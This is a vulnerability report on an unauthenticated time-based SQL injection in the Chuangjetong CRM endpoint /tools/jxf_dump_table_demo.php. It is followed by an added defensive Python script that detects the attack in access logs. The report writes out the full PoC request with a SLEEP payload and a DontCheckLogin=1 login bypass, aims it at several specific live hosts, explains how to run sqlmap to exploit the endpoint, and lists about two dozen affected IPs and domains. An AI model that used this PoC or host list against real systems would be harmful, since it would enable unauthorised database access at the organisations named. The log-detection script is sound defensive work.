Description
I. Vulnerability Description
A SQL injection vulnerability exists in the Chuangjetong CRM system from Chuangjetong Information Technology Co., Ltd., allowing attackers to obtain information from the database.
II. Vulnerability Impact
Affected product: Chuangjetong CRM
This vulnerability is unusual: the request must be sent without cookies, and neither Burp Suite nor sqlmap can carry cookies with it! I tested it directly with my PoC! Because the check is time-based, it is sensitive to network conditions.
III. Vulnerability Reproduction
Reproduction 1
IP: http://111.206.233.35:8089
Construct the PoC:
GET /tools/jxf_dump_table_demo.php?id=1&gblOrgID=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-&DontCheckLogin=1 HTTP/1.1
Host: 111.206.233.35:8089
Connection: close
Manual verification: the response is delayed by 2 seconds.
sqlmap also confirms the vulnerability. The injection is somewhat unusual in that it cannot be run with cookies: pass the saved PoC request to sqlmap with -r, do not supply sqlmap's own custom cookie, and mark the injection point with *.
python sqlmap.py -r (saved PoC request)
At the cookie prompt, answer n; at the 302 redirect prompt, also answer n.
sqlmap confirms the vulnerability.
Reproduction 2
IP: http://shcsy.ufyct.com:8000
Construct the PoC as follows; it confirms the SQL injection vulnerability.
PoC:
GET /tools/jxf_dump_table_demo.php?id=1&gblOrgID=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-&DontCheckLogin=1 HTTP/1.1
Host: shcsy.ufyct.com:8000
Connection: close
Manual verification: the response is delayed (sleep).
Reproduction 3
(1) IP: http://124.71.22.118:8000
(2) Construct the PoC as follows; it confirms the SQL injection vulnerability.
PoC:
GET /tools/jxf_dump_table_demo.php?id=1&gblOrgID=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-&DontCheckLogin=1 HTTP/1.1
Host: 124.71.22.118:8000
Connection: close
(3) Manual verification: the response is delayed.
Other affected hosts:
http://ecs-124-71-22-118.compute.hwclouds-dns.com:8000
http://116.237.71.147:8000
http://180.172.75.165:8888/
http://mlylqc.ufyct.com:8000
http://116.237.35.159:8000
http://47.120.51.105:8090/
https://cshyqdzkj.gnway.cc
http://111.206.233.35:8089
http://shcsy.ufyct.com:8000
http://125.123.66.85:8000
http://49.4.122.252:8090
http://125.123.66.81:8000
http://118.212.70.254:8000
http://159.75.254.78:66
http://222.128.95.39:8080
http://103.159.124.70:8200
http://27.152.154.53:8090
http://47.119.204.208:66
http://118.212.70.33:8000
http://118.212.70.86:8000
http://14.19.178.68:9090
http://124.71.22.118:8000
http://110.87.107.101:8090
Remediation suggestion: filter and validate the request parameters to prevent SQL injection.
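For defenders who run this CRM, the following added example (not part of the original report and not the vendor's code) shows how to detect attempts matching the PoC above in web-server access logs. It scans Common Log Format lines for requests to the debug endpoint named in the advisory and flags the two indicators visible in the PoC: a time-based SQL payload in a query parameter and the DontCheckLogin=1 flag. The log lines, client IPs and timestamps are constructed for the example; the extra SQL functions in the token list (benchmark, union) are an assumption added for broader coverage.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter names come from the PoC request in the advisory.
VULN_PATH = "/tools/jxf_dump_table_demo.php"
BYPASS_PARAM = "DontCheckLogin"

# Tokens characteristic of the time-based payload shown in the PoC.
# benchmark/union are an assumption for broader coverage, not from the page.
SQL_TOKENS = re.compile(
    r"\b(?:sleep|benchmark)\s*\(|\bselect\b|\bunion\b|--\s|/\*",
    re.IGNORECASE,
)

# Common Log Format as written by Apache/nginx by default.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_log_line(line):
    """Return the fields of one CLF line as a dict, or None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def inspect_target(target):
    """Classify one request target (path + query).

    Returns a list of human-readable reasons; an empty list means the request
    is not aimed at the vulnerable endpoint. parse_qs decodes '+' and %XX, so
    both plain and URL-encoded payload variants are normalised before matching.
    """
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return []
    reasons = ["request to debug endpoint " + VULN_PATH]
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get(BYPASS_PARAM, [""])[0] == "1":
        reasons.append("authentication bypass flag %s=1" % BYPASS_PARAM)
    for name, values in params.items():
        for value in values:
            if SQL_TOKENS.search(value):
                reasons.append("SQL tokens in parameter %s: %r" % (name, value))
    return reasons


def scan_log(lines):
    """Run inspect_target over each parsable log line and collect alerts."""
    alerts = []
    for line in lines:
        fields = parse_log_line(line)
        if fields is None:
            continue
        reasons = inspect_target(fields["target"])
        if reasons:
            alerts.append({
                "ip": fields["ip"],
                "ts": fields["ts"],
                "status": fields["status"],
                "reasons": reasons,
            })
    return alerts


# Constructed sample log (RFC 5737 documentation addresses, invented timestamps).
SAMPLE_LOG = [
    # benign request
    '203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512',
    # the advisory's PoC request, with '+' standing for space in the query string
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /tools/jxf_dump_table_demo.php'
    '?id=1&gblOrgID=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-&DontCheckLogin=1 HTTP/1.1" 200 1024',
    # same endpoint with the bypass flag but no SQL payload
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /tools/jxf_dump_table_demo.php'
    '?id=2&gblOrgID=1&DontCheckLogin=1 HTTP/1.1" 200 1024',
    # URL-encoded variant of a sleep payload, server answered with a redirect
    '192.0.2.44 - - [10/Oct/2023:13:57:12 +0000] "GET /tools/jxf_dump_table_demo.php'
    '?id=1&gblOrgID=1%20AND%20SLEEP(5)--%20- HTTP/1.1" 302 0',
    # unrelated path that merely contains the word "select" in a parameter name
    '192.0.2.44 - - [10/Oct/2023:13:58:00 +0000] "GET /report.php?select=all HTTP/1.1" 200 300',
]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["ip"], alert["status"])
        for reason in alert["reasons"]:
            print("   -", reason)
```

Scoping the SQL-token check to the one endpoint keeps false positives low; widening it to every path would need a stricter pattern than the bare "select" token used here. Any hit on the bypass flag alone is worth an alert, since legitimate traffic has no reason to send DontCheckLogin=1 to a debug script.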